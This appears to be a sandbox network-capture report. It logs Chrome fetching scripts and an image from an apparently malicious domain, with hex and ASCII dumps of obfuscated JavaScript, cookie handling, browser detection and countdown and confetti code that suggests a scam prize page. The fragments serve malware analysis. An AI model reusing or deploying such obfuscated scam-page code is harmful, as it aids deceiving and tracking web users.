                              2024-02-22 07:09:37 UTC3298INData Raw: 76 61 72 20 5f 30 78 35 31 34 63 3d 5b 27 46 71 4c 37 57 4f 46 63 53 38 6b 66 57 37 53 6b 6f 43 6b 32 27 2c 27 68 5a 68 63 53 71 27 2c 27 75 59 52 63 50 58 4e 64 4a 57 27 2c 27 57 4f 54 72 57 51 39 4a 6a 43 6f 36 57 36 68 64 4f 65 38 5a 6d 30 34 31 72 73 2f 64 49 57 27 2c 27 41 38 6b 62 65 38 6b 7a 57 34 39 45 57 35 33 63 47 53 6b 6a 67 62 37 63 4a 47 27 2c 27 79 5a 4a 64 56 6d 6f 79 64 53 6f 6b 57 50 4e 64 51 62 6d 27 2c 27 57 34 4a 63 53 73 46 63 55 38 6b 4d 74 4b 54 55 57 4f 64 63 4f 64 57 27 2c 27 57 50 4c 71 57 51 76 63 27 2c 27 79 43 6f 58 57 35 56 64 4e 31 56 64 50 53 6f 6f 68 71 50 33 57 37 42 64 48 43 6b 35 57 36 61 4b 70 38 6f 2f 6f 38 6b 2f 57 34 79 31 57 35 68 63 4d 38 6f 50 57 35 4c 2f 57 35 57 27 2c 27 57 50 66 6c 57 37 53 67 57 36 71 32 57
                              Data Ascii: var _0x514c=['FqL7WOFcS8kfW7SkoCk2','hZhcSq','uYRcPXNdJW','WOTrWQ9JjCo6W6hdOe8Zm041rs/dIW','A8kbe8kzW49EW53cGSkjgb7cJG','yZJdVmoydSokWPNdQbm','W4JcSsFcU8kMtKTUWOdcOdW','WPLqWQvc','yCoXW5VdN1VdPSoohqP3W7BdHCk5W6aKp8o/o8k/W4y1W5hcM8oPW5L/W5W','WPflW7SgW6q2W
                              2024-02-22 07:09:37 UTC1716INData Raw: 69 6e 67 5b 27 66 72 6f 6d 43 68 61 72 43 6f 64 65 27 5d 28 5f 30 78 32 39 62 37 36 32 5b 27 63 68 61 72 43 6f 64 65 41 74 27 5d 28 5f 30 78 64 30 31 36 66 36 29 5e 5f 30 78 35 38 62 64 32 30 5b 28 5f 30 78 35 38 62 64 32 30 5b 5f 30 78 32 63 32 63 33 36 5d 2b 5f 30 78 35 38 62 64 32 30 5b 5f 30 78 34 37 37 39 63 65 5d 29 25 30 78 31 30 30 5d 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 37 33 31 64 33 3b 7d 3b 5f 30 78 31 30 33 63 5b 27 72 4c 71 61 50 74 27 5d 3d 5f 30 78 31 38 62 39 35 34 2c 5f 30 78 31 61 35 32 62 39 3d 61 72 67 75 6d 65 6e 74 73 2c 5f 30 78 31 30 33 63 5b 27 4e 45 77 53 45 65 27 5d 3d 21 21 5b 5d 3b 7d 76 61 72 20 5f 30 78 31 35 36 62 36 39 3d 5f 30 78 35 31 34 63 5b 30 78 30 5d 2c 5f 30 78 36 66 30 66 64 65 3d 5f 30 78 35 31 34 63 35 34
                              Data Ascii: ing['fromCharCode'](_0x29b762['charCodeAt'](_0xd016f6)^_0x58bd20[(_0x58bd20[_0x2c2c36]+_0x58bd20[_0x4779ce])%0x100]);}return _0x4731d3;};_0x103c['rLqaPt']=_0x18b954,_0x1a52b9=arguments,_0x103c['NEwSEe']=!![];}var _0x156b69=_0x514c[0x0],_0x6f0fde=_0x514c54


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.449751185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC675OUTGET /media/mainstream/u.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC786INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: text/javascript
                              Content-Length: 8233
                              Connection: close
                              ETag: "f065c7e65477147ebe301f629e80c74e"
                              Last-Modified: Sun, 04 Feb 2024 18:35:26 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB65A7F3DFA
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1707070606#442568296/gid:0/gname:root/mode:33188/mtime:1707071726#932205905/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2024-02-04T18:35:26.965Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:37 UTC3310INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 65 74 43 6f 6f 6b 69 65 28 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 22 2b 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 5c 2e 24 3f 2a 7c 7b 7d 5c 28 5c 29 5c 5b 5c 5d 5c 5c 5c 2f 5c 2b 5e 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 2b 22 3d 28 5b 5e 3b 5d 2a 29 22 29 29 3b 72 65 74 75 72 6e 20 74 3f 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 31 5d 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 42 61 63 6b 65 6e 64 50 61 72 61 6d 73 42 79 4e 61 6d 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 67 65 74 43 6f 6f 6b 69 65 28 65 29 3f 67 65 74 43 6f 6f 6b 69 65 28 65 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                              Data Ascii: function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):null}function getBackendParamsByName(e,t){return getCookie(e)?getCookie(e):"function"==
                              2024-02-22 07:09:37 UTC4096INData Raw: 6e 65 6e 74 29 2c 74 68 69 73 2e 6a 73 6f 6e 29 74 72 79 7b 66 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 66 29 7d 63 61 74 63 68 28 65 29 7b 7d 69 66 28 74 3d 3d 3d 67 29 7b 72 3d 66 3b 62 72 65 61 6b 7d 74 7c 7c 28 72 5b 67 5d 3d 66 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 20 72 7d 7d 72 65 74 75 72 6e 20 6f 2e 73 65 74 3d 6f 2c 6f 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 6f 2c 65 29 7d 2c 6f 2e 67 65 74 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 61 70 70 6c 79 28 7b 6a 73 6f 6e 3a 21 30 7d 2c 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 6f 2e 64 65 66 61 75 6c 74 73 3d 7b 7d 2c 6f 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f
                              Data Ascii: nent),this.json)try{f=JSON.parse(f)}catch(e){}if(t===g){r=f;break}t||(r[g]=f)}catch(e){}}return r}}return o.set=o,o.get=function(e){return o.call(o,e)},o.getJSON=function(){return o.apply({json:!0},[].slice.call(arguments))},o.defaults={},o.remove=functio
                              2024-02-22 07:09:37 UTC827INData Raw: 7d 76 61 72 20 70 3d 75 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 30 21 3d 3d 6f 3f 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 71 75 61 72 65 64 22 29 3f 6c 2b 3d 27 3c 69 20 63 6c 61 73 73 3d 22 66 6c 61 67 2d 69 63 6f 6e 20 66 6c 61 67 2d 69 63 6f 6e 2d 73 71 75 61 72 65 64 20 66 6c 61 67 2d 69 63 6f 6e 2d 27 2b 74 2e 63 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 27 22 3e 3c 2f 69 3e 27 2b 70 3a 6c 2b 3d 27 3c 69 20 63 6c 61 73 73 3d 22 66 6c 61 67 2d 69 63 6f 6e 20 66 6c 61 67 2d 69 63 6f 6e 2d 27 2b 74 2e 63 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 27 22 3e 3c 2f 69 3e 27 2b 70 3a 6c 3d 70 2c 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6c 7d 61 64 64 4c 6f 61 64 45 76 65 6e 74 28 64 69 73 61 62 6c 65 66 6f 72 6d 73 66 75 6e 63
                              Data Ascii: }var p=u.join(", ");0!==o?e.classList.contains("squared")?l+='<i class="flag-icon flag-icon-squared flag-icon-'+t.cc.toLowerCase()+'"></i>'+p:l+='<i class="flag-icon flag-icon-'+t.cc.toLowerCase()+'"></i>'+p:l=p,e.innerHTML=l}addLoadEvent(disableformsfunc


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.449752185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC682OUTGET /media/mainstream/all/ab/2.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:38 UTC795INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:38 GMT
                              Content-Type: application/javascript
                              Content-Length: 4392
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "4e465cb29c5e827f2524daea92e6bc0a"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB67DE16373
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#843577318/gid:0/gname:root/mode:33279/mtime:1653412319#997043000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:11:59.997043Z
                              Expires: Fri, 21 Feb 2025 07:09:38 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:38 UTC3301INData Raw: 76 61 72 20 5f 30 78 35 32 32 65 3d 5b 27 72 4b 54 66 62 67 46 63 54 38 6f 63 69 57 27 2c 27 57 52 6d 35 57 36 68 64 4d 32 65 33 57 37 52 64 4d 47 27 2c 27 57 4f 42 63 4d 33 4a 64 54 38 6b 6d 57 50 56 63 4d 47 27 2c 27 57 52 76 6b 73 67 56 63 50 63 53 76 27 2c 27 71 6d 6b 65 6e 38 6b 45 57 50 48 50 27 2c 27 57 34 52 64 47 59 53 4c 46 48 71 71 27 2c 27 63 78 64 63 48 38 6f 46 27 2c 27 57 37 31 59 78 64 70 63 53 38 6b 6f 6f 6d 6f 69 57 52 78 64 51 43 6f 34 57 50 30 27 2c 27 72 75 52 63 4a 75 4a 63 49 4e 65 72 46 38 6b 61 27 2c 27 77 53 6f 50 42 63 4c 72 71 43 6f 4d 57 51 71 27 2c 27 6c 53 6f 37 57 36 33 63 4d 6d 6b 5a 6f 71 27 2c 27 77 30 46 64 4d 53 6b 55 57 4f 70 64 54 38 6b 33 57 34 4a 63 53 6d 6f 68 7a 47 27 2c 27 6e 61 69 4f 57 36 6d 56 57 36 30 50 57
                              Data Ascii: var _0x522e=['rKTfbgFcT8ociW','WRm5W6hdM2e3W7RdMG','WOBcM3JdT8kmWPVcMG','WRvksgVcPcSv','qmken8kEWPHP','W4RdGYSLFHqq','cxdcH8oF','W71YxdpcS8koomoiWRxdQCo4WP0','ruRcJuJcINerF8ka','wSoPBcLrqCoMWQq','lSo7W63cMmkZoq','w0FdMSkUWOpdT8k3W4JcSmohzG','naiOW6mVW60PW
                              2024-02-22 07:09:38 UTC1091INData Raw: 31 28 30 78 31 65 35 2c 27 73 54 42 67 27 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 64 63 2c 27 56 4d 23 71 27 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 65 39 2c 27 26 39 59 28 27 29 29 2a 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 63 33 2c 27 70 62 4f 6a 27 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 64 64 2c 27 72 21 78 33 27 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 64 35 2c 27 24 6d 68 53 27 29 29 2a 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 65 31 2c 27 21 75 30 24 27 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 63 61 33 31 37 31 28 30 78 31 63 65 2c 27 7a 61 52 47 27
                              Data Ascii: 1(0x1e5,'sTBg'))+parseInt(_0xca3171(0x1dc,'VM#q'))+parseInt(_0xca3171(0x1e9,'&9Y('))*parseInt(_0xca3171(0x1c3,'pbOj'))+-parseInt(_0xca3171(0x1dd,'r!x3'))+parseInt(_0xca3171(0x1d5,'$mhS'))*-parseInt(_0xca3171(0x1e1,'!u0$'))+-parseInt(_0xca3171(0x1ce,'zaRG'


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.449753185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC687OUTGET /media/mainstream/all/ab/1102_1.js HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:38 UTC787INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:38 GMT
                              Content-Type: text/javascript
                              Content-Length: 14759
                              Connection: close
                              ETag: "32fa6d2a0774c237770a72345b00dd8b"
                              Last-Modified: Sun, 11 Feb 2024 15:21:05 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB67E7D1FAF
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1707664865#338663786/gid:0/gname:root/mode:33188/mtime:1707664865#414663911/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2024-02-11T15:21:05.439Z
                              Expires: Fri, 21 Feb 2025 07:09:38 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:38 UTC3309INData Raw: 66 75 6e 63 74 69 6f 6e 20 73 65 74 43 6f 6f 6b 69 65 28 74 2c 20 65 2c 20 6e 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 6f 20 3d 20 6e 65 77 20 44 61 74 65 3b 0d 0a 20 20 20 20 22 22 20 21 3d 20 6e 20 26 26 20 6e 75 6c 6c 20 21 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 33 36 35 29 2c 20 6f 2e 73 65 74 54 69 6d 65 28 6f 2e 67 65 74 54 69 6d 65 28 29 20 2b 20 32 34 20 2a 20 6e 20 2a 20 36 30 20 2a 20 36 30 20 2a 20 31 65 33 29 3b 0d 0a 20 20 20 20 76 61 72 20 69 20 3d 20 22 65 78 70 69 72 65 73 3d 22 20 2b 20 6f 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 3b 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 74 20 2b 20 22 3d 22 20 2b 20 65 20 2b 20 22 3b 22 20 2b 20 69 20 2b 20 22 3b 70 61 74 68 3d 2f 22 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f
                              Data Ascii: function setCookie(t, e, n) { var o = new Date; "" != n && null != n || (n = 365), o.setTime(o.getTime() + 24 * n * 60 * 60 * 1e3); var i = "expires=" + o.toUTCString(); document.cookie = t + "=" + e + ";" + i + ";path=/"}functio
                              2024-02-22 07:09:38 UTC4096INData Raw: 2d 6e 20 3c 20 30 20 26 26 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6f 29 0d 0a 20 20 20 20 20 20 20 20 7d 2c 20 31 65 33 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 6e 65 77 20 44 61 74 65 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 20 3d 20 69 28 72 2e 67 65 74 48 6f 75 72 73 28 29 29 20 2b 20 22 3a 22 20 2b 20 69 28 72 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 20 3d 20 69 28 72 2e 67 65 74 4d 6f 6e 74 68 28 29 20 2b 20 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 31 20 3c 3d 20 6a 51 75 65 72 79 28 22 2e 70 5f 76 61 72 2d 62 72 6f 77 73 65 72 22 29 2e 6c 65 6e 67 74 68 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 67 65 74 50 6c 61 74 66 6f 72
                              Data Ascii: -n < 0 && clearInterval(o) }, 1e3)); var r = new Date, a = i(r.getHours()) + ":" + i(r.getMinutes()), u = i(r.getMonth() + 1); if (1 <= jQuery(".p_var-browser").length) { var c = getPlatfor
                              2024-02-22 07:09:38 UTC4096INData Raw: 47 72 65 65 6e 22 2c 20 22 53 74 65 65 6c 42 6c 75 65 22 2c 20 22 53 61 6e 64 79 42 72 6f 77 6e 22 2c 20 22 43 68 6f 63 6f 6c 61 74 65 22 2c 20 22 43 72 69 6d 73 6f 6e 22 5d 2c 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 49 6e 64 65 78 3a 20 30 2c 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 49 6e 63 72 65 6d 65 6e 74 65 72 3a 20 30 2c 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 54 68 72 65 73 68 6f 6c 64 3a 20 31 30 2c 0d 0a 20 20 20 20 20 20 20 20 67 65 74 43 6f 6c 6f 72 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 31 30 20 3c 3d 20 74 68 69 73 2e 63 6f 6c 6f 72 49 6e 63 72 65 6d 65 6e 74 65 72 20 26 26 20 28 74 68 69 73 2e 63 6f 6c 6f 72 49 6e 63 72 65 6d 65 6e 74 65 72 20 3d 20 30 2c 20 74
                              Data Ascii: Green", "SteelBlue", "SandyBrown", "Chocolate", "Crimson"], colorIndex: 0, colorIncrementer: 0, colorThreshold: 10, getColor: function() { return 10 <= this.colorIncrementer && (this.colorIncrementer = 0, t
                              2024-02-22 07:09:38 UTC3258INData Raw: 63 61 6e 76 61 73 43 6f 6e 66 65 74 74 69 2e 77 69 64 74 68 20 3d 20 57 5f 43 6f 6e 66 65 74 74 69 2c 20 63 61 6e 76 61 73 43 6f 6e 66 65 74 74 69 2e 68 65 69 67 68 74 20 3d 20 48 5f 43 6f 6e 66 65 74 74 69 0d 0a 20 20 20 20 7d 29 0d 0a 7d 0d 0a 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 46 72 61 6d 65 20 3d 20 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 20 7c 7c 20 77 69 6e 64 6f 77 2e 77 65 62 6b 69 74 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 20 7c 7c 20 77 69 6e 64 6f 77 2e 6d 6f 7a 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 20 7c 7c 20 77 69 6e 64 6f 77 2e 6f 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 20 7c 7c 20 77 69 6e 64 6f 77 2e 6d 73
                              Data Ascii: canvasConfetti.width = W_Confetti, canvasConfetti.height = H_Confetti })}window.requestAnimFrame = window.requestAnimationFrame || window.webkitRequestAnimationFrame || window.mozRequestAnimationFrame || window.oRequestAnimationFrame || window.ms


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.449755185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:38 UTC743OUTGET /media/mainstream/all/ab/l.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:38 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:38 GMT
                              Content-Type: image/png
                              Content-Length: 9224
                              Connection: close
                              ETag: "a0560779cf67aeb9a0c19f68f3582024"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB69376D833
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#284024580/gid:0/gname:root/mode:33188/mtime:1675688264#107993000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2023-02-06T12:57:44.107993Z
                              Expires: Fri, 21 Feb 2025 07:09:38 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:38 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 01 25 08 03 00 00 00 64 a1 75 10 00 00 01 56 50 4c 54 45 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 fc af 17 ff ff ff ff ff ff fc af 17 fc af 17 ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff fc af 17 fc af 17 ff
                              Data Ascii: PNGIHDR%duVPLTE
                              2024-02-22 07:09:38 UTC4096INData Raw: ca 50 01 84 6f 8b 01 ac c1 55 5d 60 85 f1 63 80 00 08 5b 0b a0 7d 85 b4 ef 9c 46 ef 14 ea 3f 8f 6f 89 7c 7d ff 01 34 3a e0 ea f1 a0 02 98 83 ab ea 28 f8 8c 49 7c 8f 02 e8 23 ed c2 00 77 f7 82 cb 94 5e 74 e4 ca a4 7c 07 70 1b fc 9f 7b de 01 6f e4 08 a0 0a ae d4 33 e4 ca 82 bb 9b cf 0f a0 bf a1 00 ea 5d 4f ef 4c e0 38 41 2e ad 07 7c 85 33 ea 82 d6 6f 00 ec 12 02 3f 7a 3e 49 81 37 72 04 60 06 5f 60 39 06 77 49 25 f4 00 b6 74 1b d4 28 22 2d 2b b2 8a 2e 52 05 1e 7a 98 cc ae 13 01 f8 5b 58 d8 d3 0e 28 80 d8 03 b8 8a 66 90 2b 71 08 01 18 6b 6f 2b 42 38 ee 62 c8 75 aa 0a ce d2 62 d2 6f 00 67 25 70 97 b0 77 2d 00 23 ea a8 67 9b 09 60 6a 04 0f a0 10 38 00 eb 05 42 36 74 0a b9 8d 04 30 b7 84 f7 bb ee 11 7f 44 ba 26 d8 36 c6 fd 06 30 05 8e 6a 64 77 02 68 df 2d 9b ab
                              Data Ascii: PoU]`c[}F?o|}4:(I|#w^t|p{o3]OL8A.|3o?z>I7r`_`9wI%t("-+.Rz[X(f+qko+B8bubog%pw-#g`j8B6t0D&60jdwh-
                              2024-02-22 07:09:38 UTC1815INData Raw: df 14 80 90 b9 de ac fa ec 18 a4 65 55 d5 ec c4 a9 16 69 db 17 46 d0 b4 23 03 2b 2c 37 9c ce 79 cd 0e 77 2a b7 04 46 29 99 77 cd ba 6f d3 45 18 3a 4e 72 ab 5c ea 45 3f 79 29 27 b0 06 b5 45 bd f6 68 c0 2f 52 94 c0 0d 71 59 46 71 c8 1e 56 65 12 41 98 cd 9c 77 8f 86 3c c4 02 b3 4a 15 8d c9 92 81 2d 92 40 5e 0c 75 05 1a a1 19 65 82 46 0c 62 17 9b 7c 45 9b 68 84 fe 4c 6c 68 24 c7 ba cd 2a b1 e6 34 26 74 80 9b dd 79 24 0d 8d 34 0c ac 12 6e 3c ba e0 75 2d 0e 45 67 b1 a2 91 2d 03 bb d4 bd 4f 97 44 87 5b e9 39 1c 10 03 d8 2f 90 34 c5 3d e0 ef c6 d3 32 1a e2 11 03 eb 44 9a d3 04 2e d7 25 e6 e1 79 5f 00 17 df f0 6c 54 6d 04 4d 52 45 80 12 98 73 06 68 b0 04 b2 52 f2 ae e8 8a 3c c3 e6 fa 11 d5 92 4d 28 68 80 63 06 b6 54 92 e6 9c a6 09 b9 45 32 70 5b 9d ae 72 29 cd 36
                              Data Ascii: eUiF#+,7yw*F)woE:Nr\E?y)'Eh/RqYFqVeAw<J-@^ueFb|EhLlh$*4&ty$4n<u-Eg-OD[9/4=2D.%y_lTmMREshR<M(hcTE2p[r)6


